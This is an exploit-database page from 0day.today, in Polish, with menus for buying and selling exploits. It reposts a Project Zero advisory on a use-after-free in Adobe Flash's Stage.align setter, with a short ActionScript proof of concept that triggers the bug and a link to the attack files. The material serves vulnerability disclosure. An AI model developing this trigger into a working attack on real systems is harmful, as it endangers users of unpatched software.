0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Adobe Flash - Stage.align Setter Use-After-Free
Autor
Ryzyko
![](/img/risk/critlow_2.gif)
Średnie Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
CVE
Platforma
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=838 There is a use-after-free in the Stage.align property setter. When the setter is called, the parameter is converted to a string early, as a part of the new use-after-free prevention changes. This conversion can invoke script, which if the this object is a MovieClip, can delete the object, deleting the thread the call is made from, which can lead to a use-after-free. A proof-of-concept is as follows: this.createEmptyMovieClip("mc", 2); var o = { toString : f }; mc.func = ASnative(666, 4); //Stage.align setter mc.func(o); function f(){ trace("here"); mc.removeMovieClip(); for(var i = 0; i < 100; i++){ var t = new TextFormat(); // fill up the slots } } A fla and swf are attached. The swf crashes in Chrome for Windows. Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40308.zip # 0day.today [2024-07-02] #